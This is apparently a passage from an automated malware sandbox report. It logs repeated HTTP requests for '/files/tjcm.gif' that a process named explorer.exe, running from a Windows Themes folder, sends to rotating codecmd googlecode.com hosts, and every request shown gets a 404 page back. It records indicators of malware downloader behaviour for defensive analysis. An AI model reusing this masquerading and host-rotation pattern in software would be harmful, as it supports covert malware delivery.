                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:30.841276884 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          10192.168.2.44974674.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:32.084346056 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:32.813036919 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:32 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:32.813150883 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          11192.168.2.44974764.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:34.135626078 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:34.851833105 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:34 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:34.851852894 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          12192.168.2.44974866.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:36.334028959 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:37.049127102 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:36 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:37.049154043 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          13192.168.2.44974974.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:38.353219986 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:39.069102049 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:38 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:39.069123030 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          14192.168.2.44975064.233.167.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:40.309391975 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd03.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:41.025130033 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:40 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:41.025161028 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          15192.168.2.44975166.102.1.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:42.487508059 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd01.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:43.220982075 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                          Referrer-Policy: no-referrer
                                                                                                                                                          Content-Length: 1575
                                                                                                                                                          Date: Mon, 13 Jan 2025 12:17:43 GMT
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                          Jan 13, 2025 13:17:43.221009970 CET494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                          Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          16192.168.2.44975274.125.133.82807540C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2025 13:17:44.554965973 CET215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                          Host: codecmd02.googlecode.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2025 13:17:45.267776012 CET1236INHTTP/1.1 404 Not Found
